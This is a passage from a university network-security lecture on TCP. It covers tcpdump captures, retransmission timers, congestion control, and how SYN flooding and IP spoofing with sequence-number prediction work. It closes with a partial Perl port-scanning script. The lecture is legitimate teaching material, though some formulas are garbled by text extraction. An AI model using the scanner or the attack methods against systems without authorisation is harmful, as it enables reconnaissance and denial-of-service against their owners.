will discover that this option sets the snaplen option. The option stands for snapshot length. For the newer versions of tcpdump, its default is 65525 bytes which is the maximum size for a TCP segment (after it has been defragmented at the receiving end). Setting this option to 0 also kicks in the default value for snaplen. Setting -s option to 1500 harks back to old days when a packet as shown by tcpdump was synonymous with the payload of one Ethernet frame whose payload can have a maximum of 1500 bytes. However, I believe that tcpdump now shows packets after they are reassembled into tcp segments in the IP layer.]; tcpdump -X to show the packets data

payload in both hex and ASCII; tcpdump -S to show the absolute sequence numbers, as opposed to the values relative to the rst ISN; a disk le; tcpdump -w dumpFileName if you want the captured packets to be dumped into

tcpdump -r dumpFileName

if you subsequently want the contents of that le to be displayed;

etc. [But note that when you dump the captured packets into a disk le, the level of detail that you will be able to read o with the -r option may not match what youd see directly in the terminal window.] The string src or dst will cause tcpdump to report all packets that are either going shown above is referred to as

out of my laptop or coming into it. The string src or dst 128.46.144.237

a command-line expression for tcpdump. A command-line expression consists of primitives like src, dst, net, host, proto, etc. and modiers like and, not, or, etc. Command-line expressions, which can also be placed in a separate le, are used to lter the packets captured by tcpdump. As popular variant on the command-line expression I have shown above, a command like tcpdump port 22 src and dst 128.46.144.237 will show all SSH packets related to my laptop. On the other hand, a command like dst not 128.46.144.10 tcpdump port 22 and src or

will show all SSH trac other than what is related to my usual SSH connection

with the 128.46.144.10 (which is the machine I am usually logged into from my laptop). In other words, this will only show if authorized folks are trying to gain SSH access to my laptop. You can also specify a range of IP addresses for the source and/or the destination addresses. For example, an invocation like tcpdump

-nvvXSs 1500 src net 192.168.0.0/16 and dst net 128.46.144.0/128 and not icmp will cause tcpdump to capture all non-ICMP packets seen by any of your communication interfaces that originate with the address range shown and destined for the address range shown. As another variant on the command-line syntax, if you wanted to see all the SYN packets swirling around in the medium, you would call != 0 and if you wanted to see all the URG packets, you would use the syntax tcpdump tcp[13] & 2

tcpdump tcp[13] & 32 !=

36

Computer and Network Security by Avi Kak

Lecture 16

where 13 is the index of the 14th byte of the TCP packet where the control bits reside.

Before you execute any of the tcpdump commands, make sure that you turn o any other applications that may try to connect to the outside automatically. For example, the Ubuntu mail client fetchmail on my laptop automatically queries the RVL4.ecn.purdue.edu machine, which is my maildrop machine, every one minute. So I must rst turn it o by executing fetchmail -q before running the tcpdump command. This is just to avoid the clutter in the packets you will capture with tcpdump.

For the demonstration here, I will execute the following command in a window of my laptop: ssh RVL4.ecn.purdue.edu

Note that when I execute the above command, I am already connected to the Purdue PAL2.0 WiFi network through my wlan0 network interface. Note also that just before executing the above command, I have run the following command in a separate window of the laptop:
tcpdump -vvv -nn -i wlan0 -s 1500 -S -X -c 5 src 10.185.37.87 or dst 10.185.37.87 and port 22

where 10.185.37.87 is the IP address assigned to my laptop. The IP address of RVL4.ecn.purdue.edu is 128.46.144.10.
37

Computer and Network Security by Avi Kak

Lecture 16

You will see this address in the packet descriptions below.

Here are the ve packets captured by the packet snier:


11:19:12.740733 IP (tos 0x0, ttl 64, id 37176, offset 0, flags [DF], proto TCP (6), length 60) 10.185.37.87.47238 > 128.46.144.10.22: Flags [S], cksum 0x8849 (correct), seq 2273331440, win 5840, options [mss 1460,sackOK,TS val 49207752 ecr 0,nop,wscale 7], length 0 0x0000: 4500 003c 9138 4000 4006 6661 80d3 b216 E..<.8@[email protected].... 0x0010: 802e 900a b886 0016 8780 48f0 0000 0000 ..........H..... 0x0020: a002 16d0 8849 0000 0204 05b4 0402 080a .....I.......... 0x0030: 02ee d9c8 0000 0000 0103 0307 ............

11:19:12.744139 IP (tos 0x0, ttl 57, id 54821, offset 0, flags [DF], proto TCP (6), length 64) 128.46.144.10.22 > 10.185.37.87.47238: Flags [S.], cksum 0xa52e (correct), seq 2049315097, ack 2273331441, win 49560, options [nop,nop,TS val 549681759 ecr 49207752,mss 1428,nop,wscale 0,nop,nop,sackOK], length 0 0x0000: 4500 0040 d625 4000 3906 2870 802e 900a E..@.%@.9.(p.... 0x0010: 80d3 b216 0016 b886 7a26 1119 8780 48f1 ........z&....H. 0x0020: b012 c198 a52e 0000 0101 080a 20c3 7a5f ..............z_ 0x0030: 02ee d9c8 0204 0594 0103 0300 0101 0402 ................

11:19:12.744188 IP (tos 0x0, ttl 64, id 37177, offset 0, flags [DF], proto TCP (6), length 52) 10.185.37.87.47238 > 128.46.144.10.22: Flags [.], cksum 0xa744 (correct), seq 2273331441, ack 2049315098, win 46, options [nop,nop,TS val 49207752 ecr 549681759], length 0 0x0000: 4500 0034 9139 4000 4006 6668 80d3 b216 E..4.9@[email protected].... 0x0010: 802e 900a b886 0016 8780 48f1 7a26 111a ..........H.z&.. 0x0020: 8010 002e a744 0000 0101 080a 02ee d9c8 .....D.......... 0x0030: 20c3 7a5f ..z_

11:19:12.749205 IP (tos 0x0, ttl 57, id 54822, offset 0, flags [DF], proto TCP (6), length 74) 128.46.144.10.22 > 10.185.37.87.47238: Flags [P.], cksum 0xf4f0 (correct), seq 2049315098:2049315120, ack 2273331441, win 49560, options [nop,nop,TS val 549681760 ecr 49207752], length 22 0x0000: 4500 004a d626 4000 3906 2865 802e 900a E..J.&@.9.(e.... 0x0010: 80d3 b216 0016 b886 7a26 111a 8780 48f1 ........z&....H. 0x0020: 8018 c198 f4f0 0000 0101 080a 20c3 7a60 ..............z 0x0030: 02ee d9c8 5353 482d 322e 302d 5375 6e5f ....SSH-2.0-Sun_ 38

Computer and Network Security by Avi Kak

Lecture 16

0x0040:

5353 485f 312e 312e 330a

SSH_1.1.3.

11:19:12.749332 IP (tos 0x0, ttl 64, id 37178, offset 0, flags [DF], proto TCP (6), length 52) 10.185.37.87.47238 > 128.46.144.10.22: Flags [.], cksum 0xa72d (correct), seq 2273331441, ack 2049315120, win 46, options [nop,nop,TS val 49207752 ecr 549681760], length 0 0x0000: 4500 0034 913a 4000 4006 6667 80d3 b216 E..4.:@[email protected].... 0x0010: 802e 900a b886 0016 8780 48f1 7a26 1130 ..........H.z&.0 0x0020: 8010 002e a72d 0000 0101 080a 02ee d9c8 .....-.......... 0x0030: 20c3 7a60 ..z

Each block of the output shown above corresponds to one TCP packet that is either going out of my laptop or coming into it. You can tell the direction of the packet transmission from the arrow symbol > between the two IP addresses in each packet. [As mentioned previously, the IP address 10.185.37.87 is for my laptop and the address 128.46.144.10
is the IP address of RVL4.ecn.purdue.edu, the machine with which I wish to connect with ssh. The integer you see appended to the IP address in each case is the port number being used at that location. What follows 0x0000 in each packet is the data payload that you can ignore for now.

] The symbol S means that the SYN control ag bit is set in the packet and the symbol ack that the ACK ag bit is set. By the way, the symbol DF means Dont Fragment.

To see the 3-way handshake, look at the descriptions of the rst three packets. The rst two entries in the fourth line for each packet are the sequence number and the acknowledgment number in that packet. The sequence number in the SYN packet that my laptop sends to RVL4 to initiate a new connection is
39

Computer and Network Security by Avi Kak

Lecture 16

2273331440. The remote machine, RVL4, sends back a SYN+ACK packet with its own pseudorandomly generated sequence number 2049315097 and with the acknowledgment number 2273331441, which is the sequence number in the original SYN packet plus 1. Finally, to complete the 3-way handshake, my laptop sends to the remote machine an ACK packet with the acknowledgment number 2049315098, which is 1 plus the sequence number in the SYN+ACK packet.

40

Computer and Network Security by Avi Kak

Lecture 16

16.9: TCP RE-TRANSMISSIONS

Since TCP must guarantee reliability in communications, it retransmits a TCP segment if an ACK is not received in a certain period of time. This time period is referred to as the Retransmission Timeout (RT O).

How RT O is set is specied in RFC2988. It depends on a measured value for the Round-Trip Transmission Time (RT T ). But if RT T cannot be measured, RT O must be set to be close to 3 seconds, with backos on repeated retransmissions.

When the rst RT T measurement is made lets say that its value is R the sender TCP carries out the following calculation:
SRT T RT T V AR RT O = = = R R 2 SRT T

max(G, K RT T V AR)

where SRT T is the Smoothed Round Trip Time and RT T V AR


41

Computer and Network Security by Avi Kak

Lecture 16

is the Round-Trip Time Variation, G is the granularity of the timer, and K = 4. When a subsequent measurement of RT T becomes available lets call it R the sender must set SRT T and RT T V AR in the above calculation as follows:
RT T V AR SRT T = = (1 ) RT T V AR + |SRT T R | (1 ) SRT T + R

where = 1/8 and = 1/4. In this calculations, whenever RT O turns out to be less than 1 second, it is rounded up to 1 second arbitrarily. With regard to the measurement of RT T , this measurement must NOT be based on TCP segments that were retransmitted. However, when TCP uses the timestamp option, this constraint is not necessary.

42

Computer and Network Security by Avi Kak

Lecture 16

16.10: TCP CONGESTION CONTROL

TCP congestion control consists of the two phases described next:

PHASE 1: The Slow-Start Phase: (RFC2581)

When a connection is rst established, TCP assumes that the new segments should be injected into the network at the same rate at which acknowledgments are received from the receiver.

The rate at which TCP injects segments into the network is controlled by an optional TCP header eld called the CWND eld (for Congestion Window eld). Initially, CWND is set to one unit of SMSS, which typically translates into a TCP segment size of 512 bytes sent at the rate of one segment per RTT, where RTT stands for the Round-Trip Transmission time, as explained in Section 16.9. SMSS stands for Sender Maximum Segment Size.

43

Computer and Network Security by Avi Kak

Lecture 16

Next, each time an ACK is received from the receiver, the CWND eld is incremented by one SMSS for each ACK. This can result in the desirable exponential ramp-up because of the following reason: When ACK is received for the rst TCP segment transmitted, the CWND value will change to 2 SM SS . Now the sender will transmit two TCP segments per RTT. When the sender receives ACKs for both these segments, the CWND value will have gotten incremented to 4 SM SS . Now the sender will try to send 4 TCP segments one after another. Upon the receipt of ACKs for all these four segments, the CWND value will be get set to 8 SM SS ; and so on.

The overall packet ow rate obviously depends both on the advertised Window size set by the receiver (to take care of the buer size limitations at the receiver, as explained in Section 16.6) and the CWND value set by the sender (according the trac congestion perceived by the sender TCP).

As the sender ramps up the packet injection rate, at some point it would hit the capacity of the network and the intermediate routers will start discarding the packets, because their buers are becoming full, and sending source-quench ICMP messages back to the sender. (See Section 16.2 for ICMP messages.) This would indicate to the sender that the value of the congestion window, CWND, has become too large. The sender TCP can also detect packet loss on the basis of the
44

Computer and Network Security by Avi Kak

Lecture 16

timeouts for receiving ACK for a given packet and the receipt of duplicate ACKs.

In summary, during slow-start, the sender TCP increments CWND by at most SMSS bytes for each ACK received that acknowledges new data.

PHASE 2: Congestion Avoidance Phase: (RFC2581)

The slow-start phase ends when congestion is detected. As mentioned earlier, the sender TCP can detect congestion on the basis of the source-quench ICMP messages received from the routers. The routers send such messages when their buers become full. The slow-start phase also ends when the current value of CWND exceeds a threshold called SSTHRESH (for SlowStart Threshold).

During congestion avoidance, CWND is incremented in a way that does not exceed one SMSS per RTT (Round-Trip Time). More commonly, the formula used to update CWND during the congestion avoidance phase is
CW N D += SMSS SMSS CW N D

45

Computer and Network Security by Avi Kak

Lecture 16

This formula is used to update CWND from every incoming non-duplicated ACK.

The initial value for SSTHRESH is 65535 bytes. When congestion is rst detected, the minimum of the current value of CWND and the size of the advertised Window is saved in SSTHRESH with the stipulation that the value saved will at least twice the value of the latest TCP segment. If CWND is less than or equal to SSTHRESH, TCP is in the slowstart mode; otherwise TCP is performing congestion avoidance.

46

Computer and Network Security by Avi Kak

Lecture 16

16.11: TCP TIMERS

As the reader should have already surmised from the discussion so far, there are various timers associated with connection establishment or termination, ow control, and retransmission of data:

Connection-Establishment Timer: This timer is set when a SYN packet is sent to a remote server to initiate a new connection. If no answer is received within 75 seconds (in most TCP implementations), the attempt to establish the connection is aborted. The same timer is used by a local TCP to wait for an ACK packet after it sends a SYN+ACK packet to a remote client in response to a SYN packet received from the client because the client wants to establish a new connection.

FIN WAIT 2 Timer: This timer is set to 10 minutes when a connection moves from the FIN WAIT 1 state to FIN WAIT 2 state. If the local host does not receive a TCP packet with the FIN bit set within the stipulated time, the timer expires and is set to 75 seconds. If no FIN packet arrives within this time, the connection is dropped.
47

Computer and Network Security by Avi Kak

Lecture 16

TIME WAIT Timer: This is more frequently called a 2MSL (where MSL stands for Maximum Segment Lifetime) timer. It is set when a connection enters the TIME WAIT state during the connection termination phase. When the timer expires, the kernel data-blocks related to that particular connection are deleted and the connection terminated.

Keepalive Timer: This timer can be set to periodically check whether the other end of a connection is still alive. If the SO KEEPALIVE socket option is set and if the TCP state is either ESTABLISHED or CLOSE WAIT and the connection idle, then probes are sent to the other end of a connection once every two hours. If the other side does not respond to a xed number of these probes, the connection is terminated.

Additional Timers: Persist Timer, Delayed ACK Timer, and Retransmission Timer.

48

Computer and Network Security by Avi Kak

Lecture 16

16.12: THE MUCH-FEARED SYN FLOOD ATTACK FOR DENIAL OF SERVICE

The important thing to note is that all new TCP connections are established by rst sending a SYN segment to the remote host, that is, a packet whose SYN ag bit is set.

SYN ooding is a method that the user of a hostile client program can use to conduct a denial-of-service (DoS) attack on a computer server.

In a SYN ood attack:

The hostile client repeatedly sends SYN TCP segments to every port on the server using a fake IP address.

The server responds to each such attempt with a SYN+ACK (a response segment whose SYN and ACK ag bits are set)
49

Computer and Network Security by Avi Kak

Lecture 16

segment from each open port and with an RST segment from each closed port.

In a normal three-way handshake, the client would return an ACK segment for each SYN+ACK segment received from the server. However, in a SYN ood attack, the hostile client never sends back the expected ACK segment. And as soon as a connection for a given port gets timed out, another SYN request arrives for the same port from the hostile client. When a connection for a given port at the server gets into this state of receiving a never-ending stream of SYN segment (with the server-sent SYN+ACK segment never being acknowledged by the client with ACK segment), we can say that the intruder has a sort of perpetual half-open connection with the victim host.

To talk specically about the time constants involved, lets say that a host A sends a series of SYN packets to another host B on a port dedicated to a particular service (or, for that matter, on all the open ports on machine B).

Now B would wait for 75 seconds for the ACK packet. For those 75 seconds, each potential connection would essentially hang. A has the power to send a continual barrage of SYN packets to B, constantly requesting new connections. After B
50

Computer and Network Security by Avi Kak

Lecture 16

has responded to as many of these SYN packets as it can with SYN+ACK packets, the rest of the SYN packets would simply get discarded at B until those that have been sent SYN+ACK packets get timed out.

If A continues to not send the ACK packets in response to SYN+ACK packets from B, as the 75 second timeout kicks in, new possible connections would become available at B, These would get engaged by the new SYN packets arriving from A and the machine B would continue to hang.

B does have some recourse to defend itself against such a DoS attack. It can modify its rewall rules so that all SYN packets arriving from the intruder will be simply discarded. Nevertheless, if the SYN ood is strong enough and coming from multiple sources (especially if the source IP addresses in the incoming SYN packets are being spoofed), there may be no protection against such an attack.

The transmission by a hostile client of SYN segments for the purpose of nding open ports is also called SYN scanning. A hostile client always knows a port is open when the server responds with a SYN+ACK segment.

51

Computer and Network Security by Avi Kak

Lecture 16

16.13: IP SPOOFING

IP spoong refers to an intruder using a forged source IP address to establish a one-way connection with a remote host with the intention of executing malicious code at the remote host. This method of attack can be particularly dangerous if there exists a trusted relationship between the victim machine and the host that the intruder is masquerading as.

TCP implementations that have not incorporated RFC1948 or equivalent improvements or systems that are not using cryptographically secure network protocols like IPSec are vulnerable to IP spoong attacks.

If you have seen the movie Takedown (or read the book of the same name), you might already know that the most famous case of IP spoong attack is the one that was launched by Kevin Mitnick on the computers of a well-known security expert Tsutomu Shimomura in the San Diego area. This attack took place near the end of 1994, the book (by Shimomura and the New York Times reporter John Marko) was released in 1996, and the movie came
52

Computer and Network Security by Avi Kak

Lecture 16

out in 2000.

[Googling the attack and/or the principals involved would lead you to several links that present dierent sides to this story.]

To explain how IP spoong works, lets assume there are two hosts A and B and another host X controlled by an adversary. Lets further assume that B runs a server program that allows A to execute commands remotely at B . [As shown by several examples
in Chapter 15 of my book Scripting with Objects, it is trivial to write such server programs. Depending on how B sets up his/her server program, the commands run by A remotely in B s computer could be executed with all the privileges, including possibly the root privileges, that B has. These commands may be as simple as just getting a listing of all the les in B s home directory to more sophisticated commands that would enable A to fetch information from a database program maintained by B .]

We will also assume that A and X are on the same LAN. Imagine both being on Purdue wireless that probably has hundreds if not thousands of users connected to it at any given time. For the attack I describe below to work, X has to pretend to be A. That is, the source IP address on the outgoing packets from X must appear to come from A as far as B is concerned. That cannot be made to happen if A and X are in two dierent LANs in, say, two dierent cities. Each router that is the gateway of a LAN to the rest of the internet works with an assigned range of IP addresses that are stored in its routing table. So if a packet were to appear at a router whose source IP address is at odds with the routing
53

Computer and Network Security by Avi Kak

Lecture 16

table in the router, the packet would be discarded.

Lets say that X wants to open a one-way connection to B by pretending to be A. Note that while X is engaged in this masquerade vis-a-vis B , X must also take care of the possibility that As suspicions about possible intrusion might get aroused should it receive unexpected packets from B in response to packets that B thinks are from A.

To engage in IP spoong, X posing as A rst sends a SYN packet to B with a random sequence number: X (posing as A) > B : SY N

(sequence num : M )

Host B responds back to X with a SYN+ACK packet: B > A : SY N + ACK

(sequence num : N, acknowledgment num : M +1)

Of course, X will not see this return from B since the routers will send it directly to A. Nonetheless, assuming that B surely
54

Computer and Network Security by Avi Kak

Lecture 16

sent a SYN+ACK packet to A and that B next expects to receive an ACK packet from A to complete a 3-way handshake for a new connection, X (again posing as A) next sends an ACK packet to B with a guessed value for the acknowledgment number N + 1. X (posing as A) > B : ACK

(guessed acknowledgment num : N + 1)

Should the guess happen to be right, X will have a one-way connection with B . X will now be able to send commands to B and B could execute these commands assuming that they were sent by the trusted host A. As to what commands B executes in such a situation depends on the permissions available to A at B.

As mentioned already, X must also at the same time suppress As ability to communicate with B . This X can do by mounting a SYN ood attack on A, or by just waiting for A to go down. This X can do by sending a number of SYN packets to A just prior to attacking B . The SYN packets that X sends A will have forged source IP addresses (these would commonly not be any legal IP addresses). A will respond to these packets by sending back SYN+ACK packets to the (forged) source IP addresses. Since A will not get back the ACK packets (as the IP addresses do not correspond to any real hosts), the three-way handshake would
55

Computer and Network Security by Avi Kak

Lecture 16

never be completed for all the X -generated incoming connection requests at A. As a result, the connection queue for the login ports of A will get lled up with connection-setup requests. Thus the login ports of A will not be able to send to B any RST packets in response to the SYN+ACK packets that A will receive in the next phase of the attack whose explanation follows.

Obviously, critical to this exploit is X s ability to make a guess at the sequence number that B will use when sending the SYN+ACK packet to A at the beginning of the exchange.

To gain some insights into B s random number generator (the Initial Sequence Number (ISN) generator), X sends to B a number of connection-request packets (the SYN packets); this X does without posing as any other party. When B responds to X with SYN+ACK packets, X sends RST packets back to B . In this manner, X is able to receive a number of sequential outputs of B s random-number generator without compromising B s ability to receive future requests for connection.

Obviously, if B used a high-quality random number generator, it would be virtually impossible for X to guess the next ISN that B would use even if X got hold of a few previously used sequence
56

Computer and Network Security by Avi Kak

Lecture 16

numbers. But the quality of PRNG (pseudo-random number generators) used in many TCP implementations leaves much to be desired. [RFC1948 suggests that ve quantities, source IP address, destination IP address,
source port, destination port, and a random secret key, should be hashed to generate a unique value for the Initial Sequence Number needed at an TCP endpoint.

Note that TCP ISNs are 32-bit numbers. This makes for 4,294,967,296 possibilities for an ISN. Guessing the right ISN from this set would not ordinarily be feasible for an attacker due to the excessive amount of time and bandwidth required.

However, if the PRNG used by a host TCP machine is of poor quality, it may be possible to construct a reasonable small sized set of possible ISNs that the target host might use next. This set is called the Spoong Set. The attacker would construct a packet ood with their ISN set to the values in the spoong set and send the ood to the target host.

As youd expect, the size of the spoong set depends on the quality of the PRNG used at the target host. Analysis of the various TCP implementations of the past has revealed that the spoong set may be as small as containing a single value to as large as containing several million values.

57

Computer and Network Security by Avi Kak

Lecture 16

Michal Zalewski says that with the broadband bandwidths typically available to a potential adversary these days, it would be feasible to mount a successful IP spoong attack if the spoong set contained not too many more than 5000 numbers. Zalewski adds that attacks with spoong sets of size 5000 to 60,000 although more resource consuming are still possible.

So mounting an IP spoong attack boils down to being able to construct spoong sets of size of a few thousand entries. The reader might ask: How is it possible for a spoong set to be small with 32 bit sequence numbers that translate into 4,294,967,296 dierent possible integers?

It is because of a combination of bad pseudo-random number generator design and a phenomenon known as the birthday paradox that was explained previously in Lecture 15. Given the importance of this phenomenon to the discussion at hand, we will rst review it briey in what follows.

As the reader will recall from Section 15.5.1 of Lecture 15, the birthday paradox states that given a group of 23 or more randomly chosen people, the probability that at least two of them will have the same birthday is more than 50%. And if we randomly choose 60 or more people, this probability is greater than
58

Computer and Network Security by Avi Kak

Lecture 16

90%.

According to Equation (13) of Section 15.5.1 of Lecture 15, given a spoong set of size k and given t as the probabability that a number in the spoong set has any particular value, the probability that at least two numbers of the spoong set will have the same value is given by: p Note that t =
1 N

k (k 1)t 2

in Equation (13) of Section 15.5.1 of Lecture 15.

Lets now set t as t = 232 for 32 bit sequence numbers. Using the formula shown above, lets construct a spoong set with k = 10, 000. We get for the probability of collision (between the random number generated at the victim host B and the intruder X): p < 10000 10000 232 2 5 105

assuming that we have a perfect pseudo-random number generator at the victim machine B. [Note the change in the base of the
59

Computer and Network Security by Avi Kak

Lecture 16

exponentiation from 2 to 10.]

The probability we computed above is small but not insignicant. What can sometimes increase this probability to near certainty is the poor quality of the PRNG used by the TCP implementation at B. As shown by the work of Michal Zalewski and Joe Stewart, cryptographically insecure PRNGs that can be represented by a small number of state variables give rise to small sized spoong sets.

Consider, for example, the linear congruential PRNG (see Section 10.5 of Lecture 10) used by most programming languages for random number generation. It has only three state variables: the multiplier of the previous random number output, an additive constant, and a modulus. As explained below, a phase analysis of the random numbers produced by such PRNGs shows highly structured surfaces in the phase space. As we explain below, these surfaces in the phase space can be used to predict the next random number given a small number of the previously produced random numbers.

The phase space for a given PRNG is constructed in the following manner:

60

Computer and Network Security by Avi Kak

Lecture 16

Following Zalewski, let seq (n) represent the output of a PRNG at time step n. We now construct following three dierence sequences: x(n) y (n) z (n) = = = seq (n) seq (n 1) seq (n 1) seq (n 2) seq (n 2) seq (n 3)

The phase space is the 3D space (x, y, z ) consisting of the dierences shown above. It is in this space that low-quality PRNG will exhibit considerable structure, whereas the cryptographically secure PRNG will show an amorphous cloud of points that look randomly distributed.

Assuming that we constructed the above phase space from, say, 50, 000 values output by a PRNG. Now, at the intrusion time, lets say that we have available to us two previous values of the output of PRNG: seq (n 1) and seq (n 2) and we want to predict seq (n). We now construct the two dierences: y z = = seq (n 1) seq (n 2) seq (n 2) seq (n 3)

This denes a specic point in the (y, z ) plane of the (x, y, z ) space.
61

Computer and Network Security by Avi Kak

Lecture 16

By its denition, the value of x must obviously lie on a line perpendicular to this (y, z ) point. So if we nd all the points at the intersection of the x-line through the measured (y, z ) point and the surfaces of the phase space, we would obtain our spoong set.

In practice, we must add a tolerance to this search; that is, we must seek all phase-space points that are within a certain small radius of the x-line through the (y, z ) point.

At the beginning of this section, I mentioned that probably the most famous case of IP spoong attack is the one that was launched by Kevin Mitnick on the computers of Tsutomu Shimomura. [As I said earlier, this attack was chronicled in a book and a movie.] Since you now understand how IP spoong works, what you will nd particularly riveting is a tcpdump of the packet logs that actually show the attacker gathering TCP sequence numbers to facilitate their prediction and then the attacker hijacking a TCP connection by IP address spoong. Googling the string shimomur.txt, will lead you to the le that contains the packet logs.

62

Computer and Network Security by Avi Kak

Lecture 16

16.14: HOW FEASIBLE ARE THE SYN FLOOD AND THE IP SPOOFING ATTACKS TODAY?

The short answer is: not that feasible any more. That is, it is unlikely that a kid (or even a seasoned hacker, for that matter) logged into the internet from your neighborhood Starbucks coee shop will be able to mount a SYN ood DoS attack on your machine or trick you with IP spoong.

To understand why it has become more dicult to mount such attacks over the years, you have to know a little bit about sockets and how the sockets relate to dierent kinds of packets. Ordinarily (that is, unless an adversary is willing to hack into the TCP/IP support that is built into the kernel of the operating system on the machine), the adversary would have no choice but to use what is known as a raw socket if the adversary wants to manually set the various elds in the outgoing packets. [See the note in blue in Section 18.1 of
Lecture 18 to understand what I mean by TCP/IP support built into the OS kernel. Obviously, if you have the ability to play with the Linux source code and you know how to compile it, you should be able to create the needed capability in your machine for mounting at least a SYN ood DoS attack.

[As explained in

considerable detail in Chapter 15 of my book Scripting with Objects, a socket has three attributes: 63

Computer and Network Security by Avi Kak

Lecture 16

(1) domain, (2) type, and (3) protocol. The domain here species the address family recognized by the socket (dierent families: AF INET for the TCP sockets, AF UNIX for the Unix sockets, etc.); the type for the basic properties of the communication link to be handled by the socket (examples of type: SOCK STREAM, SOCK DGRAM, SOCK RAW); and, nally, the protocol which, as you would expect, species the protocol that will be used for the communications (examples: tcp, udp, icmp, and raw). When a socket is created, all three attributes must be consistent with one-another.

So lets say an attacker has created a raw socket, of type SOCK_RAW, and manually set the SYN control ag of the outgoing packet. When the attacker sends out this packet, the target machine will, as youd expect, respond back with a SYN+ACK packet.

Assuming for a moment that the attacker did NOT use a fake source IP address, when the TCP/IP engine on the attackers machine sees the returned SYN+ACK packet, it will be confused because the outgoing packet was not sent by an application-level protocol that it knows about. The attackers machine would not nd its TCP engine in the state SYN_SENT state; therefore the TCP/IP engine on the attackers machine will immediately send back a RST packet back to the target machine. In other words, the TCP circuit on the target machine will NOT get stuck in its 75 seconds connection establishment timer timeout period.

64

Computer and Network Security by Avi Kak

Lecture 16

If, on the other hand, the attacker did use a fake IP address in the SYN packets with which he/she is ooding the target machine, it is true that the SYN+ACK packets from the target machine will never come back to the attackers machine. However, the target machine is likely to receive an ICMP host unreachable message if the attackers fake IP address does not belong to any particular host. And even if the fake IP address used by the attacker did belong to some third party, that host will perhaps send an RST packet to the target machine since it would not be expecting a SYN+ACK packet, thus terminating the half-open connection started by the attacker.

So the bottom line is that the attacker will not be able to use his/her manually-crafted SYN packets to get the TCP on the target machine to start up its 75 seconds long connection establishment timer. And, therefore, it will be dicult for the attacker to cause the target machine to hang with regard to its connectivity to the outside.

By sending an unending barrage of SYN packets to the target machine, the attacker would, of course, be able to create some extra computational load for the target machine, but that is not the same thing as having all possible TCP circuits on the target machine get stuck by having to timeout in the connection65

Computer and Network Security by Avi Kak

Lecture 16

establishment timer intervals. Also, for all of the SYN packets the attacker sends to the target machine, the target machine will send back SYN+ACK packets that the attackers machine will have to respond to with its own RST packets, assuming that the attacker did not spoof his/her IP address. Therefore, an attackers machine will be impacted as much, if not more, if the attacker willy-nilly sends out the SYN packets without a full understanding of the role played by the sockets. Finally, as you will see in Lecture 18, the target machine can ignore most of an attackers SYN packets by rate-limiting them through appropriate rewall rules.

It will be equally dicult for a weekend warrior to mount an IP spoong attack on you if your machine is using a modern version of the TCP/IP software with its much better ISN generator.

Another obstacle faced by an attacker who wants to mount an IP spoong attack is that the ISP router may replace the fake IP address the adversary is using in an outgoing packet with the IP address assigned to the adversarys connection in the coee shop. This is referred to as NAT for Network Address Translation. More on this in in Lectures 18 and 23.

This is not to minimize the importance of the Denial66

Computer and Network Security by Avi Kak

Lecture 16

of-Service SYN ood attacks and the IP spoong attacks for breaking into a machine. A determined adversary, especially one who has the competence to modify OS kernels (say by changing the behavior of the TCP/IP related functions in the Linux kernel source code), can, of course, wreak havoc, especially if he/she has the cooperation of an ISP and, possibly, the state itself.

You can experiment with these ideas yourself by using various Perl and Python modules that allow for easy packet creation and manipulation. But before you can try to mount a SYN ood attack on a willing friends machine, you need to nd out what ports are open on the target machine. A port is open only if it is being actively monitored by a server application. Otherwise, it will be considered to be closed. A port may also appear closed because it is behind a rewall. You can use the following script to gure out what ports are open at a host [See Chapter 15 of my book Scripting With Objects to get a better understanding of this and similar other scripts in this lecture]:
#!/usr/bin/perl -w ### port_scan.pl ### Author: Avi Kak use strict; use IO::Socket; ## Usage example:
67

([email protected]) #(1) #(2)

Computer and Network Security by Avi Kak

Lecture 16

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##

port_scan.pl or port_scan.pl

moonshine.ecn.purdue.edu

1024

128.46.144.123

1024

This script determines if a port is open simply by the act of trying to create a socket for talking to the remote host through that port. Assuming that a firewall is not blocking a port, a port is open if and only if a server application is listening on it. Otherwise the port is closed. Note that the speed of a port scan may depend critically on the Timeout parameter in the socket constructor. Ordinarily, a target machine should immediately send back a RST packet for every closed port. But, as explained in Lecture 18, a firewall rule may prevent that from happening. Additionally, some older TCP implementations may not send back anything for a closed port. So if you do not set the Timeout in the socket constructor, the socket constructor will use some default value for the timeout and that may cause the port scan to take what looks like an eternity. Also note that if you set the Timeout to too small a value for a congested network, all the ports may appear to be closed while that is really not the case. I usually set it to 0.1 seconds. Note again that a port is considered to be closed if there is no server application monitoring that port. Most of the common servers monitor ports that are below 1024. So, if you are port scanning for just fun (and not for profit), limiting your scans to ports below 1024 will provide you with quicker returns. # set it to 1 if you want to see # the result for each port separately # as the scan is taking place #(3)

my $verbosity = 0;

die "Usage: port_scan.pl host start_port end_port " . "\n where \n host is the symbolic hostname or the IP " . "address of the machine whose ports you want to scan " . "\n start_port is the starting port number and " . "\n end_port is the ending port number" unless @ARGV == 3;

#(4)

68

Computer and Network Security by Avi Kak

Lecture 16

my $dst_host = shift; my $start_port = shift; my $end_port = shift; my @open_ports = (); my $testport; # Autoflush the output supplied to print $|++; # Scan the ports in the specified range: for ($testport=$start_port; $testport <= $end_port; $testport++) { my $sock = IO::Socket::INET->new(PeerAddr => $dst_host, PeerPort => $testport, Timeout => "0.1", Proto => tcp); if ($sock) { push @open_ports, $testport; print "Open Port: ", $testport, "\n" if $verbosity == 1; print " $testport " if $verbosity == 0; } else { print "Port closed: ", $testport, "\n" if $verbosity == 1; print "." if $verbosity == 0; } }

#(5) #(6) #(7) #(8) #(9)

#(10)

#(11) #(12) #(13) #(14) #(15) #(16) #(17) #(18) #(19) #(20) #(21) #(22)

# Now scan through the /etc/services file, if available, so that we can # find out what services are provided by the open ports. The goal here # is to create a hash whose keys are the port names and the values # the corresponding lines from the file that are "cleaned up" for # getting rid of unwanted space: my %service_ports; #(23) if (-s "/etc/services" ) { #(24) open IN, "/etc/services"; #(25) while (<IN>) { #(26) chomp; #(27) # Get rid of the comment lines in the file: next if $_ =~ /^\s*#/; #(28) my @entry = split; #(29) $service_ports{ $entry[1] } = join " ", split /\s+/, $_ if $entry[1];#(30) } close IN; #(31) }
69

Computer and Network Security by Avi Kak

Lecture 16

